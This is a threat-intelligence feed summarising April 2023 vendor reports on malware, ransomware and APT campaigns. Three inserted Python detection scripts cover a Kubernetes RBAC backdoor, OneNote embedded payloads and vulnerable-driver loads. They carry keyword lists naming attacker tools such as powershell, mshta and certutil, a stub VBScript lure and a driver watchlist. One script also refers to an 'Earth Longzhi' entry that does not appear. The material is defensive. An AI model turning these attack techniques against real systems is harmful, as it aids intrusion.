- BitDefender researchers have observed the modernization of Charming Kitten’s tactics, techniques, and procedures, including a new, previously unseen malware. This malware is tailored to suit individual targets and exhibits a higher level of complexity, evidenced by a unique communication approach with its command-and-control (C2) infrastructure.
Source:
https://businessinsights.bitdefender.com/unpacking-bellaciao-a-closer-look-at-irans-latest-malware
—
- Intel Source:
- Sekoia
- Intel Name:
- Raccoon_and_Vidar_Stealers_Spreading_Fake_Cracked_new
- Date of Scan:
- 2023-04-27
- Impact:
- MEDIUM
- Summary:
- Sekoia researchers have identified the infection chain that is using about a hundred fake cracked software catalog websites that redirect to several links before downloading the payload hosted on file share platforms, such as GitHub.
—
- Intel Source:
- Uptycs
- Intel Name:
- RTM_Locker_Ransomware_as_a_Service_Now_Suits_Linux_Architecture
- Date of Scan:
- 2023-04-27
- Impact:
- LOW
- Summary:
- Uptycs researchers have discovered a new ransomware binary attributed to the RTM group, a known ransomware-as-a-service (RaaS) provider. This is the first time the group has created a Linux binary. Its locker ransomware infects Linux, NAS, and ESXi hosts and appears to be inspired by Babuk ransomware’s leaked source code.
Source:
https://www.uptycs.com/blog/rtm-locker-ransomware-as-a-service-raas-linux
—
- Intel Source:
- Welivesecurity
- Intel Name:
- APT_Group_Panda_Delivering_Malware_via_Software_Updates
- Date of Scan:
- 2023-04-27
- Impact:
- HIGH
- Summary:
- ESET researchers discovered a new campaign by the APT group known as Evasive Panda targeting an international NGO in China with malware delivered through updates of popular Chinese software.
—
- Intel Source:
- Cyble
- Intel Name:
- Hackers_Selling_New_Atomic_macOS_Stealer_on_Telegram
- Date of Scan:
- 2023-04-27
- Impact:
- LOW
- Summary:
- Cyble Researchers have discovered a Telegram channel advertising a new information-stealing malware called Atomic macOS Stealer (AMOS). The malware is specifically designed to target macOS and can steal sensitive information from the victim’s machine.
Source:
https://blog.cyble.com/2023/04/26/threat-actor-selling-new-atomic-macos-amos-stealer-on-telegram/
—
- Intel Source:
- TrendMicro
- Intel Name:
- TrafficStealer_Abusing_Open_Container_APIs
- Date of Scan:
- 2023-04-27
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro have discovered a different type of attack: a piece of software that leverages Docker containers to generate money through monetized traffic. Although the software itself appears to be legitimate, it likely contains compromised components, which is why it is flagged as a potentially unwanted application.
—
- Intel Source:
- Aqua
- Intel Name:
- The_Exploiting_of_Kubernetes_RBAC_by_attackers
- Date of Scan:
- 2023-04-27
- Impact:
- LOW
- Summary:
- Aqua researchers have observed new evidence that attackers are exploiting Kubernetes (K8s) Role-Based Access Control (RBAC) in the wild to create backdoors. The attackers also tried to launch DaemonSets to take control of and seize resources from the K8s clusters they attack. Aqua’s analysis suggests that this campaign is actively targeting at least 60 clusters in the wild.
Source:
https://blog.aquasec.com/leveraging-kubernetes-rbac-to-backdoor-clusters
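An RBAC backdoor of this kind leaves two artefacts in the API server: a ClusterRoleBinding that hands cluster-admin to a ServiceAccount, and a DaemonSet that runs as that account on every node. The script below is an added example, not code from the Aqua report: it walks objects shaped like `kubectl get clusterrolebindings -o json` and `kubectl get daemonsets -A -o json` and flags that pattern. The objects, the "kube-controller" name and the trusted-registry list are constructed assumptions for the example.

```python
"""Added example (not from the Aqua report): review ClusterRoleBindings and
DaemonSets for the backdoor pattern of a ServiceAccount bound to cluster-admin
plus a privileged DaemonSet on every node. All objects below are constructed."""

ADMIN_ROLES = {"cluster-admin"}
TRUSTED_REGISTRIES = ("registry.k8s.io/",)   # assumption: tune per cluster

# Shaped like `kubectl get clusterrolebindings -o json`; the second binding is
# a made-up backdoor that hands cluster-admin to a ServiceAccount.
SAMPLE_CRBS = {"items": [
    {"metadata": {"name": "cluster-admin"},
     "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "Group", "name": "system:masters"}]},
    {"metadata": {"name": "system:controller:kube-controller"},
     "roleRef": {"kind": "ClusterRole", "name": "cluster-admin"},
     "subjects": [{"kind": "ServiceAccount", "name": "kube-controller",
                   "namespace": "kube-system"}]},
    {"metadata": {"name": "system:node-proxier"},
     "roleRef": {"kind": "ClusterRole", "name": "system:node-proxier"},
     "subjects": [{"kind": "ServiceAccount", "name": "kube-proxy",
                   "namespace": "kube-system"}]},
]}

# Shaped like `kubectl get daemonsets -A -o json`; the second one is made up.
SAMPLE_DAEMONSETS = {"items": [
    {"metadata": {"name": "kube-proxy", "namespace": "kube-system"},
     "spec": {"template": {"spec": {
         "serviceAccountName": "kube-proxy",
         "containers": [{"name": "kube-proxy",
                         "image": "registry.k8s.io/kube-proxy:v1.27.1"}]}}}},
    {"metadata": {"name": "kube-controller", "namespace": "kube-system"},
     "spec": {"template": {"spec": {
         "serviceAccountName": "kube-controller",
         "hostNetwork": True, "hostPID": True,
         "containers": [{"name": "ctl",
                         "image": "docker.io/example/worker:latest",
                         "securityContext": {"privileged": True}}]}}}},
]}


def admin_bound_service_accounts(crbs):
    """(namespace, name) of every ServiceAccount bound to an admin ClusterRole."""
    hits = set()
    for crb in crbs["items"]:
        ref = crb["roleRef"]
        if ref.get("kind") != "ClusterRole" or ref["name"] not in ADMIN_ROLES:
            continue
        for s in crb.get("subjects") or []:   # subjects may be null on real objects
            if s.get("kind") == "ServiceAccount":
                hits.add((s.get("namespace", "default"), s["name"]))
    return hits


def risky_daemonsets(daemonsets, admin_sas):
    """Flag DaemonSets that run as an admin-bound SA, use host namespaces,
    run privileged containers, or pull images from outside trusted registries."""
    out = []
    for ds in daemonsets["items"]:
        meta, pod = ds["metadata"], ds["spec"]["template"]["spec"]
        reasons = []
        if (meta["namespace"], pod.get("serviceAccountName", "default")) in admin_sas:
            reasons.append("runs as cluster-admin ServiceAccount")
        if pod.get("hostPID") or pod.get("hostNetwork"):
            reasons.append("hostPID/hostNetwork")
        for c in pod.get("containers", []):
            if (c.get("securityContext") or {}).get("privileged"):
                reasons.append("privileged container " + c["name"])
            if not c["image"].startswith(TRUSTED_REGISTRIES):
                reasons.append("untrusted image " + c["image"])
        if reasons:
            out.append((meta["namespace"] + "/" + meta["name"], reasons))
    return out


def audit(crbs, daemonsets):
    """Combine both checks; returns (admin SAs, risky DaemonSets)."""
    sas = admin_bound_service_accounts(crbs)
    return sas, risky_daemonsets(daemonsets, sas)


if __name__ == "__main__":
    sas, risky = audit(SAMPLE_CRBS, SAMPLE_DAEMONSETS)
    print("admin ServiceAccounts:", sorted(sas))
    for name, reasons in risky:
        print(name, "->", "; ".join(reasons))
```

In a real cluster, pipe the two `kubectl ... -o json` outputs through `json.load` into `audit`; legitimate add-ons (CNI plugins, kube-proxy, node agents) will trip the privileged and host-namespace rules, so keep an allowlist of expected DaemonSets and treat any new cluster-admin ServiceAccount as the high-signal finding.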
—
- Intel Source:
- Cyble
- Intel Name:
- PaperCut_actively_exploited_in_the_Wild
- Date of Scan:
- 2023-04-27
- Impact:
- MEDIUM
- Summary:
- Earlier this month, PaperCut published a security alert stating that it had evidence of unpatched servers being exploited in the wild; Russian threat actors are suspected of exploiting the PaperCut vulnerability. The vendor advisories cover two CVEs, CVE-2023-27350 (severity: Critical) and CVE-2023-27351 (severity: High). Cyble researchers share their details in their post.
Source:
https://blog.cyble.com/2023/04/25/print-management-software-papercut-actively-exploited-in-the-wild/
—
- Intel Source:
- PaloAlto
- Intel Name:
- PingPull_Malware_is_Updated_by_Chinese_Alloy_Taurus
- Date of Scan:
- 2023-04-27
- Impact:
- LOW
- Summary:
- Unit 42 researchers have identified a new variant of PingPull malware used by Alloy Taurus actors and designed to target Linux systems. While following the infrastructure the actor leveraged for this PingPull variant, they also identified the use of another backdoor tracked as Sword2033.
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Phishing_Attack_Increasing_in_Singapore_for_Tax_Portal
- Date of Scan:
- 2023-04-26
- Impact:
- LOW
- Summary:
- Researchers from SANS have identified an IRAS phishing website that looks legitimate and asks users to input their Singapore Personal Access (Singpass) credentials, which are used to access government and private services (such as banking) in Singapore.
Source:
https://isc.sans.edu/diary/Strolling+through+Cyberspace+and+Hunting+for+Phishing+Sites/29780/
—
- Intel Source:
- Zero Day Initiative (ZDI)
- Intel Name:
- New_the_Mirai_botnet_exploit
- Date of Scan:
- 2023-04-26
- Impact:
- MEDIUM
- Summary:
- The Zero Day Initiative threat-hunting team recently discovered new exploitation attempts in Eastern Europe showing that the Mirai botnet has added an exploit for CVE-2023-1389 (ZDI-CAN-19557/ZDI-23-451). The vulnerability in the TP-Link Archer AX21 Wi-Fi router was originally disclosed to ZDI during the Pwn2Own Toronto event, where it was used by Team Viettel in their LAN-side entry against the TP-Link device and by Qrious Security in their WAN-side entry.
—
- Intel Source:
- ASEC
- Intel Name:
- Tonto_Team_Using_Anti_Malware_Related_Files_for_DLL_Side_Loading
- Date of Scan:
- 2023-04-26
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified the Tonto Team threat group is targeting mainly Asian countries and has been distributing Bisonal malware
—
- Intel Source:
- ASEC
- Intel Name:
- RokRAT_Malware_Distributing_Through_LNK_Files
- Date of Scan:
- 2023-04-26
- Impact:
- LOW
- Summary:
- ASEC researchers have observed that the RedEyes threat group (also known as APT37, ScarCruft), which distributed CHM Malware Disguised as Security Email from a Korean Financial Company last month, has also recently distributed the RokRAT malware through LNK files.
—
- Intel Source:
- Infoblox
- Intel Name:
- Finding_Decoy_Dog_Toolkit_via_Anomalous_DNS_Traffic
- Date of Scan:
- 2023-04-26
- Impact:
- LOW
- Summary:
- Researchers from Infoblox have identified a new malware toolkit named Decoy Dog that allows attackers to avoid standard detection techniques and target enterprises. It uses DNS query dribbling and strategic domain aging to bypass security checks.
—
- Intel Source:
- ReversingLabs
- Intel Name:
- Repurposing_Package_Name_on_PyPI_to_Push_Malware
- Date of Scan:
- 2023-04-25
- Impact:
- LOW
- Summary:
- Researchers from ReversingLabs have observed a malicious package on the Python Package Index (PyPI) named termcolour, a three-stage downloader published in multiple versions.
Source:
https://www.reversinglabs.com/blog/package-names-repurposed-to-push-malware-on-pypi
—
- Intel Source:
- Securelist
- Intel Name:
- The_Analysis_of_Tomiris_Group
- Date of Scan:
- 2023-04-25
- Impact:
- LOW
- Summary:
- Securelist researchers have continued to track Tomiris as a separate threat actor over three new attack campaigns between 2021 and 2023 and it is targeting government and diplomatic entities in the CIS.
Source:
https://securelist.com/tomiris-called-they-want-their-turla-malware-back/109552/
—
- Intel Source:
- Checkpoint
- Intel Name:
- New_Findings_of_Educated_Manticore
- Date of Scan:
- 2023-04-25
- Impact:
- MEDIUM
- Summary:
- Researchers from Checkpoint have revealed new findings about an activity cluster closely related to Phosphorus, an Iran-affiliated threat group operating in the Middle East and North America. It presents a new and improved infection chain leading to the deployment of a new version of PowerLess, an implant previously attributed to Phosphorus.
—
- Intel Source:
- Cofense
- Intel Name:
- After_15_Years_release_Open_Source_Gh0st_RAT_still_Haunting_Inboxes
- Date of Scan:
- 2023-04-25
- Impact:
- LOW
- Summary:
- The Cofense Intelligence Unit discovered Gh0st RAT, an old open-source RAT, targeting a healthcare organization. Gh0st RAT was created by a Chinese hacking group named C. Rufus Security Team, and the public release of its source code made it easy for threat actors to adapt it against victims. Its capabilities include taking full control of the infected machine, recording keystrokes in real time with offline logging, accessing live webcam feeds and microphone recording, downloading files remotely, remote shutdown and reboot, and disabling user input.
Source:
https://cofense.com/blog/open-source-gh0st-rat-still-haunting-inboxes-15-years-after-release/
—
- Intel Source:
- Huntress
- Intel Name:
- Zero_Day_Vulnerabilities_in_PaperCut_Print_Management_Software
- Date of Scan:
- 2023-04-24
- Impact:
- LOW
- Summary:
- Researchers from Huntress have tracked the exploitation of zero-day vulnerabilities against PaperCut MF/NG which allow for unauthenticated remote code execution due to an authentication bypass.
Source:
https://www.huntress.com/blog/critical-vulnerabilities-in-papercut-print-management-software
—
- Intel Source:
- Jamf
- Intel Name:
- BlueNoroff_APT_Group_Targeting_macOS_With_RustBucket_Malware
- Date of Scan:
- 2023-04-24
- Impact:
- LOW
- Summary:
- Jamf Threat Labs have discovered a macOS malware family that communicates with command and control (C2) servers to download and execute various payloads. They track and protect against this malware family under the name ‘RustBucket’ and suspect it to be attributed to a North Korean, state-sponsored threat actor.
Source:
https://www.jamf.com/blog/bluenoroff-apt-targets-macos-rustbucket-malware/
—
- Intel Source:
- Securonix Threat Labs
- Intel Name:
- New_OCX_HARVESTER_Attack_Campaign_Using_Modernized_More_Eggs_Suite
- Date of Scan:
- 2023-04-24
- Impact:
- MEDIUM
- Summary:
- Securonix Threat Labs researchers have observed a new attack campaign tracked as OCX#HARVESTER. Some of the malicious payloads leveraged as part of the attack campaign observed appear to be related to the More_eggs malicious payloads reported earlier.
—
- Intel Source:
- Symantec
- Intel Name:
- X_Trader_Supply_Chain_Attack_Affecting_Critical_Infrastructure_Organizations_in_US_and_Europe
- Date of Scan:
- 2023-04-24
- Impact:
- MEDIUM
- Summary:
- Researchers from Symantec have identified that North Korean-linked operations affected more organizations beyond 3CX, including two critical infrastructure organizations in the energy sector.
Source:
https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/xtrader-3cx-supply-chain
—
- Intel Source:
- Cyble
- Intel Name:
- The_QakBot_Malware_Continues_to_Evolve
- Date of Scan:
- 2023-04-24
- Impact:
- LOW
- Summary:
- Cyble Research Intelligence Labs have observed that several malware families, such as AsyncRAT, QuasarRAT, DCRAT, etc., have been found using OneNote attachments as part of their tactics. In February 2023, the well-known malware, Qakbot, started using OneNote attachments in their spam campaigns.
Source:
https://blog.cyble.com/2023/04/21/qakbot-malware-continues-to-morph/
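A OneNote lure works because a .one file can carry arbitrary embedded files (scripts, executables, Office documents) that the viewer will launch on a double-click. Each embedded file sits in a FileDataStoreObject record with a fixed header GUID, a 64-bit length and a footer GUID, so a scanner does not need to parse the whole notebook. The script below is an added example, not code from the Cyble report: it locates every such record, classifies the payload by magic bytes or script keywords, and marks the risky ones. The GUIDs are the documented MS-ONE/MS-ONESTORE values; the sample blob, its payloads and the magic/keyword tables are constructed for the example.

```python
"""Added example (not from the Cyble report): list and classify files embedded
in a OneNote (.one) file by walking its FileDataStoreObject records.
Uses the documented MS-ONE GUIDs; the sample blob below is constructed."""
import struct
import uuid

ONE_FILE_MAGIC = uuid.UUID("7B5C52E4-D88C-4DA7-AEB1-5378D02996D3").bytes_le
FDSO_HEADER = uuid.UUID("BDE316E7-2665-4511-A4C4-8D4D0B7A9EAC").bytes_le
FDSO_FOOTER = uuid.UUID("71FBA722-0F79-4A0B-BB13-899256426B24").bytes_le
# FileDataStoreObject: guidHeader(16) cbLength(8) unused(4) reserved(8) FileData guidFooter(16)
FDSO_DATA_OFFSET = 16 + 8 + 4 + 8

MAGIC = {b"MZ": "PE executable", b"\x7fELF": "ELF", b"%PDF": "PDF",
         b"PK\x03\x04": "ZIP/Office", b"\xd0\xcf\x11\xe0": "OLE2", b"\x89PNG": "PNG"}
SCRIPT_HINTS = (b"<script", b"powershell", b"wscript", b"cmd /c", b"cmd.exe",
                b"mshta", b"certutil", b"#!/")
RISKY = {"PE executable", "ELF", "OLE2", "script"}


def build_fdso(payload):
    """Wrap payload in one FileDataStoreObject (used here to build the sample)."""
    return (FDSO_HEADER + struct.pack("<Q", len(payload)) + b"\x00" * 12
            + payload + FDSO_FOOTER)


def is_onenote(blob):
    """True if the blob starts with the .one file-type GUID."""
    return blob[:16] == ONE_FILE_MAGIC


def extract_embedded_files(blob):
    """Return [(offset, data)] for every complete FileDataStoreObject in blob."""
    found, pos = [], 0
    while True:
        pos = blob.find(FDSO_HEADER, pos)
        if pos < 0 or pos + FDSO_DATA_OFFSET > len(blob):
            break
        (length,) = struct.unpack_from("<Q", blob, pos + 16)
        start = pos + FDSO_DATA_OFFSET
        data = blob[start:start + length]
        if len(data) == length:          # skip truncated records
            found.append((pos, data))
        pos = start + max(length, 1)
    return found


def classify(data):
    """Label a payload by magic bytes, then by script keywords in its head."""
    for magic, label in MAGIC.items():
        if data.startswith(magic):
            return label
    head = data[:4096].lower()
    if any(h in head for h in SCRIPT_HINTS):
        return "script"
    return "unknown"


def scan_onenote(blob):
    """Return [(offset, size, label, risky)] for each embedded file."""
    results = []
    for off, data in extract_embedded_files(blob):
        label = classify(data)
        results.append((off, len(data), label, label in RISKY))
    return results


# Constructed sample: .one magic, padding, then a PNG stub, a VBScript lure
# and a PE stub, each wrapped as a FileDataStoreObject.
SAMPLE_ONE = (ONE_FILE_MAGIC + b"\x00" * 64
              + build_fdso(b"\x89PNG\r\n\x1a\n" + b"\x00" * 32)
              + build_fdso(b'<script language="VBScript">CreateObject("WScript.Shell")'
                           b'.Run "cmd /c echo constructed"</script>')
              + build_fdso(b"MZ\x90\x00" + b"\x00" * 60))

if __name__ == "__main__":
    print("onenote:", is_onenote(SAMPLE_ONE))
    for off, size, label, risky in scan_onenote(SAMPLE_ONE):
        print(f"offset {off:#x} size {size} type {label} risky={risky}")
```

Run it over a real attachment with `scan_onenote(open(path, "rb").read())`; a mail gateway rule that quarantines any .one carrying a risky payload catches this whole class of lure regardless of which malware family is behind it. Note that OneNote files can also embed the same executable as a compressed section or reference it by an "onetoc2" table of contents, which this scan does not cover.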
—
- Intel Source:
- TrendMicro
- Intel Name:
- ViperSoftX_Encryption_Updates
- Date of Scan:
- 2023-04-24
- Impact:
- LOW
- Summary:
- TrendMicro researchers have observed the cryptocurrency and information stealer ViperSoftX evading initial-loader detection and making its lure more believable by keeping the initial package loader, delivered via cracks, keygens, activators, and packers, non-malicious.
Source:
https://www.trendmicro.com/en_us/research/23/d/vipersoftx-updates-encryption-steals-data.html
—
- Intel Source:
- PaloAlto
- Intel Name:
- Scams_Involving_ChatGPT_Are_on_the_Rise
- Date of Scan:
- 2023-04-22
- Impact:
- LOW
- Summary:
- Unit42 researchers have monitored the newly registered domains and squatting domains related to ChatGPT, as it is one of the fastest-growing consumer applications in history. The dark side of this popularity is that ChatGPT is also attracting the attention of scammers seeking to benefit from using wording and domain names that appear related to the site.
Source:
https://unit42.paloaltonetworks.com/chatgpt-scam-attacks-increasing/
—
- Intel Source:
- Fortinet
- Intel Name:
- The_Examination_of_EvilExtractor_Tool
- Date of Scan:
- 2023-04-22
- Impact:
- MEDIUM
- Summary:
- FortiGuard Labs researchers have analyzed EvilExtractor, an attack tool designed to target Windows operating systems and extract data and files from endpoint devices. They also observed this malware in a phishing email campaign on 30 March.
Source:
https://www.fortinet.com/blog/threat-research/evil-extractor-all-in-one-stealer
—
- Intel Source:
- Sophos
- Intel Name:
- Two_New_QakBot_C2_Servers_Detected
- Date of Scan:
- 2023-04-22
- Impact:
- LOW
- Summary:
- Sophos researchers have detected two new QakBot servers that have not yet been publicly identified. These servers are used by threat actors to manage and control QakBot infections, a banking trojan that has been active since 2008 and primarily targets financial institutions and their customers.
Source:
https://news.sophos.com/en-us/2023/04/20/new-qakbot-c2-servers-detected-with-sophos-ndr/
—
- Intel Source:
- Welivesecurity
- Intel Name:
- Lazarus_Hackers_Pushing_Linux_Malware_via_Fake_Job_Offers
- Date of Scan:
- 2023-04-22
- Impact:
- MEDIUM
- Summary:
- Researchers from Welivesecurity have identified a new Lazarus campaign, considered part of “Operation DreamJob”, that targets Linux users with malware for the first time.
—
- Intel Source:
- Google Blog
- Intel Name:
- Russian_Hackers_Conducting_Phishing_Attacks_in_Ukraine
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- Google Threat Analysis researchers have observed that Russian government-backed phishing campaigns targeted users in Ukraine the most, with the country accounting for over 60% of observed Russian targeting.
Source:
https://blog.google/threat-analysis-group/ukraine-remains-russias-biggest-cyber-focus-in-2023/
—
- Intel Source:
- Team-Cymru
- Intel Name:
- SideCopy_Attack_Chain_Deploying_AllaKore_RAT
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- Researchers from Team-Cymru have analyzed the SideCopy group and discovered the SideCopy attack chain used to deploy AllaKore RAT. It is an open-source remote access tool that has been modified for the purposes of SideCopy operations and is commonly observed in their intrusions.
Source:
https://www.team-cymru.com/post/allakore-d-the-sidecopy-train
—
- Intel Source:
- ASEC
- Intel Name:
- Distribution_of_the_BlackBit_ransomware
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- AhnLab Security Emergency response Center (ASEC) recently discovered the distribution of the BlackBit ransomware disguised as svchost.exe during the team’s monitoring. According to ASEC’s internal infrastructure, the BlackBit ransomware has been continuously distributed.
—
- Intel Source:
- Threatmon
- Intel Name:
- New_Attack_Chain_Uncovered_From_Blind_Eagle_Cyber_Espionage_Group
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- Researchers from Threatmon have observed that the cyber espionage actor tracked as Blind Eagle has been linked to a new multi-stage attack chain that leads to the deployment of the NjRAT remote access trojan on compromised systems.
Source:
https://threatmon.io/apt-blind-eagles-malware-arsenal-technical-analysis/
—
- Intel Source:
- Secureworks
- Intel Name:
- Bumblebee_Malware_Distributing_Via_Trojanized_Installer_Downloads
- Date of Scan:
- 2023-04-21
- Impact:
- MEDIUM
- Summary:
- Secureworks researchers have observed Bumblebee malware being distributed through trojanized installer downloads of legitimate software.
Source:
https://www.secureworks.com/blog/bumblebee-malware-distributed-via-trojanized-installer-downloads
—
- Intel Source:
- NTT Security
- Intel Name:
- USB_Based_FlowCloud_Malware_Attacks
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- Researchers from NTT Security have observed that several companies have been infected with FlowCloud, malware used by the attack group TA410 and observed since around 2019.
Source:
https://insight-jp.nttsecurity.com/post/102id0t/usbflowcloud
—
- Intel Source:
- Symantec
- Intel Name:
- Play_Ransomware_Group_Using_New_Custom_Data_Gathering_Tools
- Date of Scan:
- 2023-04-21
- Impact:
- MEDIUM
- Summary:
- Symantec researchers have identified that the Play ransomware group is using two new, custom-developed tools that allow it to enumerate all users and computers on a compromised network, and copy files from the Volume Shadow Copy Service (VSS) that are normally locked by the operating system.
—
- Intel Source:
- Sucuri
- Intel Name:
- Hackers_Using_Abandoned_WordPress_Plugins_to_Backdoor_Websites
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- Sucuri researchers have identified that attackers are using Eval PHP, an outdated legitimate WordPress plugin, to compromise websites by injecting stealthy backdoors.
Source:
https://blog.sucuri.net/2023/04/massive-abuse-of-abandoned-evalphp-wordpress-plugin.html
—
- Intel Source:
- Sophos
- Intel Name:
- EDR_Killer_AuKill_Exploiting_Process_Explorer_Drivers
- Date of Scan:
- 2023-04-21
- Impact:
- MEDIUM
- Summary:
- Sophos researchers have investigated multiple incidents where attackers attempted to disable EDR clients with a new defense evasion tool dubbed AuKill. The AuKill tool abuses an outdated version of the driver used by version 16.32 of the Microsoft utility, Process Explorer, to disable EDR processes before deploying either a backdoor or ransomware on the target system.
Source:
https://news.sophos.com/en-us/2023/04/19/aukill-edr-killer-malware-abuses-process-explorer-driver/
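AuKill and the Earth Longzhi campaign above (zamguard64.sys) share the same BYOVD mechanic: a signed but vulnerable driver is dropped somewhere writable and registered as a kernel service, which the System log records as Event ID 7045. The script below is an added example, not code from the Sophos or TrendMicro reports: it parses constructed records in that shape and flags kernel driver installs whose file name is on a watchlist, whose hash is on a blocklist, or whose image lives outside System32\drivers. zamguard64.sys comes from the entry above; "legacydriver.sys", the SHA-256 values and the collector-added SHA256 field are hypothetical placeholders.

```python
"""Added example (not from the Sophos or TrendMicro reports): flag kernel driver
installs recorded as System log Event ID 7045 whose file name, hash or path
points at a bring-your-own-vulnerable-driver (BYOVD) load. Records are constructed."""
import re
from pathlib import PureWindowsPath

# zamguard64.sys is named in the Earth Longzhi entry; "legacydriver.sys" is a
# hypothetical placeholder for further watchlist entries.
WATCHLIST_NAMES = {"zamguard64.sys", "legacydriver.sys"}
# Placeholder SHA-256 values standing in for a real blocklist such as
# Microsoft's recommended driver block rules; these are not real hashes.
FAKE_BLOCKED_HASH = "0" * 63 + "1"
BLOCKLIST_SHA256 = {FAKE_BLOCKED_HASH}
DRIVER_DIR = r"c:\windows\system32\drivers" + "\\"
KV = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Constructed records shaped like Event ID 7045 (service installed), with a
# SHA256 column assumed to be added by the log collector.
SAMPLE_EVENTS = "\n".join([
    r'2023-04-19T09:58:02Z EventID=7045 ServiceName=vmci '
    r'ImagePath=C:\Windows\System32\drivers\vmci.sys '
    r'ServiceType="kernel mode driver" StartType="boot start" SHA256=' + "a" * 64,
    r'2023-04-19T10:02:11Z EventID=7045 ServiceName=zamguard '
    r'ImagePath=C:\Users\Public\zamguard64.sys '
    r'ServiceType="kernel mode driver" StartType="demand start" SHA256=' + "b" * 64,
    r'2023-04-19T10:02:40Z EventID=7045 ServiceName=svcdrv '
    r'ImagePath=\??\C:\ProgramData\svcdrv.sys '
    r'ServiceType="kernel mode driver" StartType="demand start" SHA256=' + FAKE_BLOCKED_HASH,
    r'2023-04-19T10:05:00Z EventID=7045 ServiceName=Updater '
    r'ImagePath="C:\Program Files\App\upd.exe" '
    r'ServiceType="user mode service" StartType="auto start" SHA256=' + "c" * 64,
])


def parse_event(line):
    """Turn one key=value record into a dict; quoted values keep their spaces."""
    rec = {k: v.strip('"') for k, v in KV.findall(line)}
    rec["timestamp"] = line.split(" ", 1)[0]
    return rec


def normalize_image_path(raw):
    """Drop the NT '\\??\\' prefix that 7045 ImagePath values often carry."""
    if raw.startswith("\\??\\"):
        raw = raw[4:]
    return PureWindowsPath(raw)


def flag_driver_installs(log_text, names=WATCHLIST_NAMES, hashes=BLOCKLIST_SHA256):
    """Return (timestamp, service, path, reasons) for suspicious kernel driver installs."""
    hits = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        rec = parse_event(line)
        if rec.get("EventID") != "7045" or "driver" not in rec.get("ServiceType", "").lower():
            continue
        image = normalize_image_path(rec.get("ImagePath", ""))
        reasons = []
        if image.name.lower() in names:
            reasons.append("file name on vulnerable-driver watchlist")
        if rec.get("SHA256", "").lower() in hashes:
            reasons.append("hash on driver blocklist")
        if not str(image).lower().startswith(DRIVER_DIR):
            reasons.append("driver loaded from outside System32\\drivers")
        if reasons:
            hits.append((rec["timestamp"], rec.get("ServiceName"), str(image), reasons))
    return hits


if __name__ == "__main__":
    for ts, svc, path, reasons in flag_driver_installs(SAMPLE_EVENTS):
        print(ts, svc, path, "->", "; ".join(reasons))
```

The production version of the hash check is Microsoft's vulnerable driver blocklist enforced through HVCI or a WDAC policy, which stops the load before any log line is written; this script is the retrospective hunt for hosts where that enforcement was off. Driver names are easy to change, so the path and hash rules carry more weight than the watchlist.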
—
- Intel Source:
- CSIRT-MON
- Intel Name:
- Belarus_Linked_Hacking_Group_Targeting_Poland_With_New_Disinformation_Campaign
- Date of Scan:
- 2023-04-21
- Impact:
- MEDIUM
- Summary:
- CSIRT-MON researchers have issued a warning Wednesday about a recent disinformation campaign that has been traced back to the Belarusian hacking group known as Ghostwriter.
Source:
https://csirt-mon.wp.mil.pl/pl/articles/6-aktualnosci/dezinformacja-o-rekrutacji-do-litpolukrbrig/
—
- Intel Source:
- Symantec
- Intel Name:
- Daggerfly_APT_Group_Targeting_Telecoms_Company_in_Africa
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- Researchers from Symantec have identified that Telecommunication services providers in Africa are the target of a new campaign orchestrated by a China-linked threat actor at least since November 2022.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Hackers_Promptly_Adopting_Web3_IPFS_Technology
- Date of Scan:
- 2023-04-21
- Impact:
- LOW
- Summary:
- PaloAlto researchers have observed several types of cyberthreats using the InterPlanetary File System (IPFS), including phishing, credential theft, command and control (C2) communications, and malicious payload distribution. They also observed a significant jump in IPFS-related traffic at the beginning of 2022.
Source:
https://unit42.paloaltonetworks.com/ipfs-used-maliciously/
—
- Intel Source:
- Blackberry
- Intel Name:
- Google_Ads_Abuse_and_Spear_Phishing_Campaigns_Impersonating_Spains_Tax_Agency
- Date of Scan:
- 2023-04-20
- Impact:
- LOW
- Summary:
- Researchers from BlackBerry have observed two parallel malicious campaigns that use the same infrastructure but have different purposes. The first campaign is related to a malvertising Google Ads Platform and the second campaign is related to a massive spear-phishing campaign targeting large organizations based in Spain. The campaign impersonated Spain’s tax agency, with the goal of harvesting the email credentials of companies in Spain.
—
- Intel Source:
- Cyble
- Intel Name:
- New_Strain_of_Ransomware_Named_CrossLock
- Date of Scan:
- 2023-04-20
- Impact:
- LOW
- Summary:
- Cyble researchers have discovered a new strain of ransomware called CrossLock, which is written in the programming language “Go”. It employs the double-extortion technique to increase the likelihood of payment from its victims and this technique involves encrypting the victim’s data as well as exfiltrating it from their system.
—
- Intel Source:
- Uptycs
- Intel Name:
- Hackers_From_Pakistan_Using_Linux_Malware_Poseidon_to_Target_Indian_Government_Agencies
- Date of Scan:
- 2023-04-20
- Impact:
- MEDIUM
- Summary:
- Researchers from Uptycs have identified a Pakistan-based advanced persistent threat actor known as Transparent Tribe using a two-factor authentication (2FA) tool used by Indian government agencies as a ruse to deliver a new Linux backdoor called Poseidon.
Source:
https://www.uptycs.com/blog/cyber_espionage_in_india_decoding_apt_36_new_linux_malware
—
- Intel Source:
- Cofense
- Intel Name:
- Phishing_Campaign_Targeting_EPOS_Net_Customers
- Date of Scan:
- 2023-04-20
- Impact:
- LOW
- Summary:
- Cofense Phishing Defense Center have observed a sophisticated phishing campaign targeting EPOS Net customers, a large Japanese credit card company. The campaign is notable for its meticulously crafted emails and cloned website, as well as its use of official customer service numbers to establish an illusion of legitimacy.
—
- Intel Source:
- Morphisec
- Intel Name:
- The_Critical_Component_of_Aurora_Stealer_Attack_Delivery_Chain
- Date of Scan:
- 2023-04-19
- Impact:
- LOW
- Summary:
